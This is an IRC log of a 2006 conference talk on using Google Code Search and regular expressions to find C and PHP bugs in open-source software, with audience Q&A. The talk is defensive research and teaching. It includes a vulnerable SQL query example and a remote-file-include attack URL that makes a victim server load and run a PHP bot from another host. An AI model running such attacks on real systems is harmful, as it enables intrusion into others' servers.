VII International Conference of Unix at Uninet
  • Presentation
  • Register
  • Program
  • Organizing Comittee
  • Listing of registered people
  • Translators team
jose.log
tricks. Slides: http://monkey.org/~jose/presentations/umeet06/slides/'
ismak_homvamos a comenzar con la segunda charla de la tarde/noche
ismak_homwe are going to start with the second speaker
ismak_homJose Nazario. Stupid google tricks
ismak_homJose Nazario es consultor de seguridad senior en la empresa de usa Arbor
Networks
ismak_homDr. Jose Nazario is a Senior Security Engineer within Arbor Networks'
Arbor Security Engineering
ismak_hom & Response Team (ASERT).
ismak_homDr. Nazario's research interests include BotNets and worms, data mining,
DDoS, source code analysis tools
ismak_homJose esta muy interesado en el estudio y análisis de las redes de bots,
malware, data mining, y herramientas de análisis de codigo...
ismak_homJose es posedor de un phd en bioquimica
ismak_hompor la universidad de Case Western Reserve en 2002
ismak_homHe is the author of the books "Defense and Detection Strategies against
Internet Worms" and
ismak_hom"Secure Architectures with OpenBSD."
ismak_homEs el autor de varios libros de seguridad "Defense and Detection
Strategies against Internet Worms" y "Secure Architectures with OpenBSD."
ismak_homDr. Nazario regularly speaks at conferences worldwide, with past
presentations at CanSecWest,
ismak_homPacSec, Blackhat, and NANOG.
ismak_homHe also maintains WormBlog.com, a site devoted to studying worm
detection and defense research.
ismak_homJose Nazario es ponente habitual en las conferencias de seguridad mas
importantes del mundo
ismak_homCon presencia en CanSecWest, PacSec, Blackhat, and NANOG
ismak_homy mantiene el blog: www.wormblog.com
ismak_homdedicado a la investigacion en la detección y defensa contra worms
ismak_homYou can view the slides talk: http://monkey.org/~jose/presentations/umeet0
6/slides/
ismak_homSin mas dilacion, os dejo con un gran experto en seguridad y un gran
amgigo, Jose. it's your time...
ismak_homLas preguntas se realizaran en el canal #qc
jose_ngracias ismak_hom!
jose_nhola a todos, buenas y gracias. hello everyone, i hope all of you are
jose_nhaving a good day, and thank you for coming. my name is jose nazario and
jose_ni'll be talking about google codesearch.
jose_n
jose_nthe talk will be in English
jose_n
jose_ni'll be referring to my slides here: http://monkey.org/~jose/presentations/umeet06
/slides/
jose_n
jose_n[slide 1] today's talk is intended to introduce you to google codesearch
jose_nand ways that you can use it to find all sorts of programming bugs in
jose_ndozens of software applications at once.
jose_ni'll provide you with a one or
jose_ntwo slide introduction to google codesearch.
jose_n
jose_nalso, since i promised google tricks (plural), i'll give you guys one
jose_nmore that i don't see used often: the dot operator. i found this
jose_naccidentally when i was looking for an RPM package once.
jose_ni found that
jose_n"package.rpm" brought up "package, rpm" also. turns out that google
jose_nseems to drop punctuation from the index and from your search terms, and
jose_nreplaces it with the generic "stuff we don't index" filler.
jose_nso, you can
jose_nnow join your words in a phrase with the dot and match all sorts of
jose_ncombinations. compare searching for "foo bar" against "foo.bar" (with
jose_nthe first still quoted).
jose_nthe quotes enforce a space, but the dot allows
jose_nyou to have commas or other non-word stuff in there. kind of neat, and
jose_nlike i said, i don't see people using this often.
jose_n[slide 2] i am not employed by google and i do not represent them. keep this in
jose_nmind when you're watching this talk. this is not an official google
jose_ntalk.
jose_n[slide 3] ok, google codesearch. as i recall it was launched by google's
jose_n"labs" division (where new products come from) in early Octobers, 2006,
jose_nso just a couple of months ago. codesearch is different than google's
jose_nnormal search in that it focuses on searching source code on the web.
jose_nthis includes C, PHP, C++, Java, and of course scripting languages like
jose_npython, ruby, and perl. like google, it supports search operators, which
jose_nlet you control the search inputs. unlike google's basic search,
jose_nhowever, it supports regular expressions. this means we can really dig
jose_ninto code flexibly.
jose_nbefore, if you wanted to search on google for some
jose_nsource code you had to use the terms and "lang:c" in your input. now,
jose_ngoogle codesearch lets you apply patterns to find things more flexibly.
jose_n
jose_nin a nutshell, google's indexed millions of source code files. they've
jose_ndownloaded it so you don't have to! great if you have ever been curious
jose_nabout searching for bugs in code, like we'll be doing. far easier than
jose_ndownloading thousands of source packages, storing them, and grepping
jose_nthrough them.
jose_n
jose_ngoogle codesearch isn't the first code search engine. koders.com has
jose_nbeen around for a while and they have a neat engine. it doesn't appear
jose_nto support regular expressions, but it does have many other neat
jose_nfeatures.
jose_nfor example, i recently used koders.com to find some BSD licensed code to
jose_ninclude in a tool that i ported from BSD to Linux. these search engines
jose_nare great for that sort of thing.
jose_n
jose_n[slide 4] ok, it's a beta of a google product so it'll have some bugs,
jose_nthat's to be expected. it tends to forget that you want a case sensitive
jose_nsearch once you crawl past the first page, for example.
jose_nalso, it's
jose_nregular expression engine is only applying the terms to a single line at
jose_na time, so you can't make use of back references (a power regex facility
jose_nthat let you build up complex queries on the fly).
jose_nalso, google
jose_ncodesearch doesn't always know what the newest source archive is, so
jose_nsometimes you'll find a great bug and it will have been fixed in a a
jose_nnewer version.
jose_n
jose_nall in all, though, not a bad tool to have at your disposal, as you'll
jose_nsee.
jose_n
jose_n[slide 5] OK, so basics about regular expressions in case you haven't
jose_nseen or used them before. regexes are basically a way of expressing text
jose_npatterns to match specific characters or ranges of characters.
reset by peer)
jose_nfor
jose_nexample, to match any character you can use the . characters; the *
jose_nmeans 0 or more characters, and + means one or more of the preceded
jose_ncharacters. these can be mixed and matched, of course, such as .+ to
jose_nmean one or more characters.
jose_n to specify a range, use [x-y] to denote a
jose_nrange of characters, such as [A-Za-z] to match all alphabetical
jose_ncharacters.
jose_n
jose_nif you wanted to negate something, use the [^x] character. sadly, this
jose_nonly works on a single character at a time, so [^a-z] wont work. :-/ you
jose_nhave to escape characters that have special meaning, like (, ) and .
jose_nusing the backslash: \. to match a ., or \( to match a (.
jose_n
jose_nsee the URL in the page to learn more about regex formats. they're not
jose_nthat hard to learn, but very complex ones require some practice. because
jose_nthey're used in so many things in UN*X-land, you should become familiar
jose_nwith them.
jose_nhttp://www.evolt.org/article/rating/20/22700/
jose_n
jose_n[slide 6] just like normal google searches, you can use special
jose_noperators to restrict your search. you can focus on the C language, for
jose_nexample, using "lang:c" in your search.
jose_nyou can also negate these, or
jose_nchain them together:
jose_nfoobar lang:(c|c++) -lang:php
jose_n
jose_nyou can also restrict by license, using the license: operator. ie to get
jose_nonly GPL files, use license:gpl. google codesearch infers the license
jose_nfrom various files in the source repository.
jose_n
jose_nyou can, of course, restrict by filename or by package, using the
jose_noperators file: and package:. this basically applies these arguments to
jose_nthe result set. for example, to match only C header files, using
jose_nfile:\.h$ (anything ending in .h).
jose_nyou may want o focus on a particular
jose_npackage, focusing on only a website or a file format, using the package
jose_noperator. this one is a lot like "inurl" in a standard google query.
jose_n
jose_nwe'll be using some of these these operators in our searches to keep our
jose_nresults focused.
jose_n
jose_na couple of facts about google codesearch, one known and one  not so
jose_nwell known. if your result set has more than one hit, you can use "n" to
jose_nbrowse to the next result (kind of like "n" in a vi search). very handy!
jose_ngoogle codesearch highlights the results for you, also very nice.
jose_n
jose_nsecondly, google codesearch seems to include some non-software archives
jose_nin its index. i found this by accident while searching for my name!
jose_nbasically, what i found was someone's Linux home directory backup.
jose_nbecause they had some example code on a website that i wrote in their
jose_nmozilla cache, google marked it a sa code archive to include. voila, i
jose_nfound their backup. quite interesting, to say the least. i'm sure other
jose_ninteresting backups are out there, too.
jose_n
jose_n[slide 8] screen shot showing my results that found a backup in google
jose_ncodesearch. this is a backup of someone's home directory. my name
jose_nappeared in their mozilla cache.
jose_n
jose_n[slide 9] in a nutshell, this is our strategy for finding bugs. it's
jose_nbased on the basic openbsd philosophy: find a bug, fix it, generalize
jose_nthe form, find it everywhere, fix it everywhere.
jose_nfor example, when you
jose_nfind a typo, it's usually not the only one of its kind. fix it, find the
jose_nothers, and fix them.
jose_n
jose_nwhat we're going to do here is to to identify a bug or some bad
jose_nprogramming practice, and generalize that form into a regular
jose_nexpression. we'll then apply that regular expression to google
jose_ncodesearch and then examine the results.
jose_n
jose_ni've found that a well formed regular expression yields about 10% or
jose_nmore in bugs from the search results.
jose_n
jose_nwhat you should do when you apply this is to ensure that the bug still
jose_nexists in the latest version of the code. i often have to visit the
jose_nproject website, look for the latest released version and possibly the
jose_nsource repository (SVN or CVS) and see if it's still there.
jose_nif the bug is still there generate a patch and file a bug. i did this in October for a
jose_nvariety of projects, including OpenAFS, MPlayer, MySQL, and many others.
jose_ni got a bunch of bugs fixed over a single cup of coffee, that's how easy
jose_nthis can be.
jose_n[slide 10] i'll show you four basic bugs here and how we find them in google
jose_ncodesearch. you'll learn the regular expressions for some common C logic
jose_nbugs (at least two of which have real security bug implications),
jose_nsome C
jose_nstring handling bugs, and two types of common PHP bugs: SQL injection
jose_nand file include bugs.
jose_n
jose_n[slide 11] the first set of bugs we'll find in google codesearch are
jose_nsome logic bugs. specifically, there's a logic bug in C that people
jose_nencounter when they make the typo of "&" vs "&&". & is a bitwise AND,
jose_nand && is a logical AND.
jose_nspecifically, you use "&" to test for the
jose_npresence of a bit in a variable, and "&&" to test that two conditions
jose_nare two (a logical AND).
jose_nvery often you'll see people building up a set of flags in an integer,
jose_nmixing the flags together in a variable "flags".
jose_nthey'll then use
jose_nlogical ANDs to look for specific flags being set, such as FLAG_PROCESS
jose_nor FLAG_OLD_INPUT.
jose_nthe test is if (flags & FLAG_MINE) { /* do some stuff */ }
jose_nthe complement of that is to look for two things being true, such as this:
jose_n    if (is_set && process) { /* do more stuff */ }
jose_nonly if "is_set" and "process" are not 0 or not NULL will that be true.
jose_n
jose_na common typo to make is to see && when someone meant &.
jose_n
jose_nthis is also present in the bitwise vs logical OR ("|" vs "||") and in
jose_nthe comparison vs assignment operators ("==" vs "=").
jose_n
jose_n[slide 12] ok, this is what we'll search for: flags\ *&&\ *[A-Za-z_]*
jose_nthis will look for the line where someone has "flags" (a common variable
jose_nname) and a logical AND of a variable in upper case letters (usually
jose_nused for a macro).
jose_nthis is a common typo in C code. what's funny is that
jose_nthe compiler treats this as reasonable code, so you wont get a warning.
jose_nhowever, if "flags" is not 0 or NULL and the macro is defines as
jose_nnot 0 or NULL, this condition will always be true. this is bad,
jose_nobviously, and not what the programmer intended.
jose_n(err if the macro is DEFINED as not 0 ...)
jose_n
jose_nso, let's search google codesearch for this ...
jose_n
jose_n[slide 13] here is an example bug in neon, found and fixed by one of our
jose_ninterns. the blue highlights the for, and we can infer what the
jose_nprogrammer meant by reading the code.
jose_nwhat they meant to do was to see
jose_nif the session protocol flags has the AUTH_FLAG_VERIFY_NON40x bit set,
jose_nbut in this case that part of the test will always evaluate to true.
jose_nif the other parts of the condition are true, then we'll see a mistaken
jose_n"verify" part get hit.
jose_n
jose_nneon fixed this bug after jon (our intern) filed a report. this bug
jose_nprevents the neon DAV component from evaluating the session properly. it
jose_ndoesn't turn up often, but it is a real bug.
jose_n
jose_na coworker, aaron campbell, found a doozy of a bug in openssl
jose_ncertificate checking this way. he filed a bug report and got it fixed in
jose_nunder an hour.
jose_ni found several bugs in MySQL, Mplayer, OpenAFS and other
jose_nprojects like this, and even wound up finding a security bug in OS X
jose_nusing this expression.
jose_n
jose_n[slide 14] let's look for an old school C bug. this was common about 10
jose_nyears ago and has been whittled away quickly, but you'll still find it
jose_nfrom time to time.
jose_nbasically what we'll be looking for is the programmer
jose_ncopying user-supplied into into a buffer without any sanity or length
jose_nchecking.
jose_n(err user-supplied DAT into a buffer ...)
jose_nin this case, we'll look for someone using strcat() (string
jose_nconcatenation or joining) from a user supplied argument (argv[x]). this
jose_nis possibly a reliability bug, and even a security bug in some cases.
jose_n
jose_nthis isn't so common anymore, because it's so easy to find, yet people
jose_nstill do it.
jose_n
jose_n[slide 15] so, this is what we'll search for: strcat\ *\(\ *.*\ *,\ *argv lang:c
jose_nthis looks for strcat followed by 0 or more spaces, then an open
jose_nparentheses, then any characters, then a comma, and then argv (with
jose_noptional spaces, "\ *", in there).
jose_noh, and we'll restrict ourselves to
jose_nthe C language.
jose_n
jose_nthe problem here is that the destination buffer may not be large enough
jose_nto hold the user-supplied input.
jose_nin fact, strcat() and strcpy() don't do
jose_nany length checking, they happily shove all the data from the source
jose_ninto the dest and if it overflows, so be it. however, the user can craft
jose_nthe input and commit a basic buffer overflow.
jose_n
jose_n[slide 16] ok, it's 2006, and not surprisingly these are uncommon now.
jose_nthankfully, too!
jose_nthis is a bug i foun while searching for this, we can
jose_nsee that the buffer "command" gets built as a 10240 byte (10k) buffer,
jose_nand for every argument supplied, the command is grown by the next
jose_nargument and a space.
jose_nwe may be able to overflow this, i'm not sure the
jose_nshell would allow it, but you get the idea. here we have two idioms
jose_nmixed that are dangerous: a user-controlled loop (argc controls how many
jose_ntimes it executes) and user supplied input going into a static buffer
jose_nunchecked (strcpy() from argv).
jose_n
jose_nbad code, and revealed by google codesearch.
jose_n
jose_n[slide 17] here are some other basic C bugs you can look for. you can generalize
jose_nthe argc controlled loop pretry easily by looking for while loops and for
jose_nloops including argc.
jose_n(argc is the number of arguments passed on the command line, argv is a list of
arguments given on the command line. both are user controlled.)
jose_nother bug classes you can easily look for are
jose_nformat string bugs, looking for unformatted arguments to common
jose_nfunctions like printf(), syslog() and the like.
jose_n
jose_nyou can also look for overflows in the sprintf() and related functions.
jose_nagain, look for a user-controlled input.
jose_n
jose_nhere, because google codesearch isn't allowing for backrefs, you have to
jose_nweed these out manually. it's pretty tough to do, and =these sorts of
jose_nbugs are not very common anymore, either.
jose_nwith backrefs, we could easily
jose_n"taint" user supplied variable data and follow it through the code.
jose_n
jose_n[slide 18] so, let's move on to the first of two sets of PHP bug
jose_nclasses. the first is SQL injection attacks and vulnerabilities. SQL
jose_ninjection bugs are very common and easily created.
jose_nbasically, they come
jose_nfrom scenarios where developers build up SQL commands using unescaped,
jose_nunscrubbed user-supplied input.
jose_n
jose_n14:54 < MJesus:#qc> is McAffe SiteAdvisor based in google search?
jose_ni don't think so, i think they have their own toolbar to have their userbase inform
them of bad sites (malware, phishing, etc)
jose_ngoogle has their own "safe browsing" toolbar, in IE7 now, too! (and built into
FFox 2.0)
jose_n
jose_nthere's a link here to show you how to exploit SQL injection bugs. i
jose_nwont get into that here, but suffice it to say it's trivial.
jose_nhttp://www.securiteam.com/securityreviews/5DP0N1P76E.html
jose_n  
jose_n[slide 19] so, this is what we'll search for:
jose_n    SELECT\ *[^%]\ *$_GET lang:php
jose_nthis looks for SELECT being followed by a GET parameter reference
jose_nwithout any formatting going on. there's no escaping in many of these
jose_ncases, as well.
jose_n
jose_nthe results? about 2000 hits on google codesearch. now that's a lot of bugs.
jose_n
jose_n14:58 < mefistofe:#qc> jose_n: so if we just want to search for code in a
jose_nspecific software, say mplayer, we just add "mplayer" to the search line?
jose_nmefistofe: yes, or package:mplayer
jose_n
jose_n[slide 20] here's an example, and (so it would fit on the screen) this
jose_none isn't all that high profile.
jose_n(some of the other projects that had
jose_nthis are blogging software, CMS software, etc, all sorts of web apps).
jose_nhere the query string is built from a raw, unprocessed user-supplied
jose_nvariable:
jose_n    $query = "SELECT * FROM item WHERE ID == '" . $_GET['id'] ."'";
jose_n
jose_n"query" references "id" from the user without any stripping of special
jose_nSQL characters. there's nothing stopping you from closing that query and
jose_ncreating a new one (ie to call out stored procedures to get shell
jose_naccess), or modifying it to show all items (ie where id = 1 OR id > 0).
jose_n
jose_nthis is the basic form of an SQL injection bug, and easy to avoid. lots
jose_nof PHP books show you how to avoid this, and this is sadly too common in
jose_nPHP code.
jose_n
jose_n[slide 21] while i showed you SELECT for a GET parameter, you will also
jose_nwant to look for other SQL commands: INSERT, UPDATE, DELETE, and you'll
jose_nalso want to look for this in POST variables, too (ie $_POST['id']).
jose_n
jose_nwhen you expand this out, lots more bugs, all very similar, appear. :)
jose_n
jose_n[slide 22] the second type of PHP bug class here is due to remote file
jose_nincludes. PHP has the "include()" directive which lets you include a
jose_nlocal file. however, PHP also lets you include remote files from another
jose_nweb server.
jose_n
jose_nhere the exploit is to grab a malicious PHP file off of a website you
jose_ncontrol. the exploit then has the argument to the variable include a URL.
jose_ni recently found a bot that can be used in these attacks, called
jose_n"pBot". it is designed to be included in PHP remote file include attacks
jose_nand works quite well.
jose_n
jose_n[slide 23] so, what should you search for? just like before, look for
jose_nthe function using an unscrubbed argument:
jose_n    include\ *\(\ *\$_GET lang:php
jose_nthis looks for the PHP include function with an argument from the GET
jose_nparameter, and only in PHP files. very straight forward, here the
jose_nattacker can control the input directly.
jose_n
jose_n[slide 24] some real results found in google codesearch: include calls
jose_nout to "page", a user supplied variable, and appends .php. what's the
jose_nattack look like?
jose_n15:09 < mefistofe:#qc> jose_n: how to avoid this bug?
jose_nin the PHP docs for include, here: http://us2.php.net/include/
jose_nin the comments they talk about enforcing what you expect, a local file or a
specific URL path
jose_n
jose_nsuppose i have a malicious website and a malicious PHP file, like pBot
jose_n:). i store it as
jose_n    http://monkey.org/~jose/php/pBot.php
jose_nso, i attack an installation of this software like this:
jose_n    http://victim.com/admin.php?file=http://monkey.org/~jose/php/pBot
jose_nthe application, and the web server, will now include and run my PHP
jose_ncode. voila, a simple attack, and we found this in google codesearch.
jose_n
jose_n[slide 25] i showed you how to use the GET variable, and you should also
jose_nlook for PHP using untrustworthy input from cookies, POST variables, and
jose_nanything else the user can supply, such as hostnames.
jose_nalso, you can find
jose_ncross site scripting bugs this way, too, also looking for user-supplied
jose_ninput being used without any treatment.
jose_n
jose_nthe PHP docs have excellent discussions on secure programming idioms, by
jose_nthe way, so if you code in PHP, make sure you follow those!
jose_n
jose_n[slide 26] ok, so i showed you four basic bug classes and how to find
jose_nthem in google codesearch. there are some obvious limits to using google
jose_ncodesearch for your code audits.
jose_n
jose_nfirst, you still have to read the code. you still have to follow the
jose_nlogic and see if it's a real bug, and you still have to understand the
jose_ncode and any implications it has.
jose_n
jose_n15:15 < mefistofe:#qc> jose_n: and only Open Source apps :P
jose_nnot always true :) some commercial software is based on OSS code, so
sometimes these bugs affect commercial code
jose_n
jose_ndon't forget that if you think you found a bug, you still have to make sure it's the
latest version of the code before
jose_nyou fire off a bug report.
jose_n
jose_nyou have to tune your regular expressions to keep the false positives
jose_ndown. compare searches for "strcat" vs strcat\ *\(\ *.*\ *,\ *argv. the
jose_nformer will find lots of basic libc definitions of strcat, the later
jose_nwill find real uses of it.
jose_n
jose_n15:17 < mefistofe:#qc> jose_n: what if we are not 100% sure it's a bug... how
jose_nto proof it? ... we could try exploiting the bug but wouldnt that be illegal?
jose_nwell, sine you're working with OSS software, you can run it locally. if it's
commercial software, you can buy it (or borrow it) and test it.
jose_nobviously do NOT go exploit someone else's machine to test this!
jose_n
jose_ngoogle codesearch is basically grep on steroids (in terms of speed and
jose_nquantity of input, but it is missing backrefs), and it will only find
jose_nsingle line bugs. you wont find many of the truly clever bugs this way.
jose_n
jose_nhowever, i found at least two security bugs like this in just one
jose_nmorning, over one cup of coffee: one is OS X (CVE-2006-4410)
jose_n
jose_nand one in
jose_nanother project i wont name here because the bug (and security hole) are
jose_nstill active. coworkers aaron and jon found two more security bugs in a
jose_nmatter of minutes.
jose_n
jose_n[slide 27] to sum it up, google codesearch is pretty nifty, and a lot
jose_neasier than trying to download all sorts of code and screening it
jose_nlocally. believe me, i've done that!
jose_n
jose_nhowever, it doesn't support the google web service API yet, and it
jose_ndoesn't appear to be included in any IDE tools yet (like Koders is). i
jose_nimagine this will happen in time.
jose_n
jose_n[slide 28] some more links for you to read. the first is from a
jose_ncoworker, aaron, and he gives some searches you can look at and explains
jose_nhow they work, and the bugs they yield. a very great post! aaron's an
jose_nawesome hacker and a great coworker at arbor.
jose_n
jose_nthe second two are posts by me discussing codesearch and giving some
jose_nbasic insecurity statistics using it.
jose_n
jose_nthe fourth is a post from the securiteam blog giving more searches and
jose_ntheir results. lots more fun luring in google codesearch, that's for
jose_nsure.
jose_n
jose_n[slide 29] finally, again, this was all started by a morning IRC
jose_nconversation with my arbor colleague aaron campbell. we wasted a good
jose_nmorning futzing around, finding bugs, and aaron found a nifty openssl
jose_n0.9.8 bug in a matter of minutes. make sure you read his blog posting.
jose_n
jose_nthank you all for your time and attention, i hope you have found this to
jose_nbe fun and interesting.
mefistofeheh
ismak_homGreat!!!!! COngratulations and thank you for your time
jose_nthanks guys
Walsenso interesting indeed
xtingrayclap clap clap clap clap clap clap clap clap clap
Rub3nCclap clap clap clap clap clap, thanks jose_n very interesting!!!
xtingrayclap clap clap clap clap clap clap clap clap clap
xtingrayclap clap clap clap clap clap clap clap clap clap
Rub3nCclap clap clap clap clap clap
xtingrayclap clap clap clap clap clap clap clap clap clap
Walsenthanks to you
Rub3nCclap clap clap clap clap clap
Rub3nCclap clap clap clap clap clap
Rub3nCclap clap clap clap clap clap
ismak_homclap clap clap clap clap clap clap clap clap clap
ismak_homclap clap clap clap clap clap clap clap clap clap
ismak_homclap clap clap clap clap clap clap clap clap clap
ismak_homclap clap clap clap clap clap clap clap clap clap
ismak_homclap clap clap clap clap clap clap clap clap clap
ismak_homclap clap clap clap clap clap clap clap clap clap
ismak_homclap clap clap clap clap clap clap clap clap clap
ismak_homclap clap clap clap clap clap clap clap clap clap
ismak_homclap clap clap clap clap clap clap clap clap clap
mefistofewhat the hell
Rub3nCclap clap clap clap clap clap
Rub3nCclap clap clap clap clap clap
mefistofeclap clap clap clap clap clap clap clap clap clap clap
mefistofeclap clap clap clap clap clap clap clap clap clap clap
mefistofeclap clap clap clap clap clap clap clap clap clap clap
jose_nno :) just my blog postings
mefistofe:o
mefistofeI didnt notice
mefistofelol
Walsenwhy not?
mefistofesorry...that was for #qc
jose_nWalsen: is that question for me?
Walsenyes
jose_nwhy didn't i tell google about it?
Walsenyes
jose_ni told a couple of friends who work there but they weren't surprised it was being
done. and it only speeds up the process of finding bugs ...
Walsenthey can buy arbor xD (google)
jose_nwould be nice if they did ...
Rub3nCjose_n, why you named this talk Stupid google tricks, if it very interesting?
plaesbtw, how can I join the #qc ?:)
jose_nRub3nC: i couldn't think of a better title
mefistofeplaes: /join #qc
Rub3nCthanks jose_n i will polish my regular expression skill with google codesearch
plaesmefistofe22:10 [uninet] -!- Cannot join channel (+r)
edition of umeet, you can see that all the lectures from Jose are very interesting, original
investigations and, true master lectures!
mefistofewell is my first time here... though I liked the title :P
Rub3nCMJesus, when i find that lectures??
jose_nRub3nC: http://monkey.org/~jose/presentations/
mefistofeone thing is not clear to me... probably my english limitations... what's the
meaning of backrefs?
Rub3nCjose_n, thanks
jose_nmefistofe: back references
jose_nor references to previous matches
mefistofewell in the context of google codesearch
mefistofehmmmm
ghostbarmefistofe, referencias de vuelta
mefistofeI see... thats something google codesearch lacks?
jose_nyeah, it's a regexthing that they didn't implement
jose_nplaes: you should be able to join #qc now
jose_nin codesearch? probably an authentication bypass in some software.
Walseno.o
gntpnk2hello
jose_nyeah, the admin wants you to authenticate and you can log in without proper
credentials
jose_nbypassing the restrictions
plaesthx :)
Walsenan important software?
jose_nthe OS X bug i found was similar to aaron's openssl bug. in each case they fail
to properly see if an SSL certificate is valid in some circumstances
jose_nWalsen: i wont say, the software is still unfixed
jose_nemail to the authors bounced
jose_nno
jose_ni don't know much about alltheweb
jose_ni don't know if they support searching source code. even basic google lets you
say that you only want to search C source code files.
jose_nsuch as nazario filetype:c
ismak_homOk, thank you for your questions
ismak_homand thank you Jose for your time with this excellent research
ismak_homy muchas gracias a todos los que habeis estado en la conferencia y habeis
aportado vuestras preguntas
jose_nthanks again, guys
ismak_homla proxima conferencia sera dentro de 10 minutos: Qt 4.2 : A new age for Qt
developers (Gustavo Gonzlez)
jose_ni have to go, my wife and i still haven't had lunch!
ghismoclap
ghismoclap
jose_nthank you MJesus, and thank you ismak_hom! thanks everyone :)

Generated by irclog2html.pl by Jeff Waugh - find it at freshmeat.net!

© 2006 - www.uninet.edu - Contact Organizing Comittee - Valid XHTML - Valid CSS - Based on a design by Raul Pérez Justicia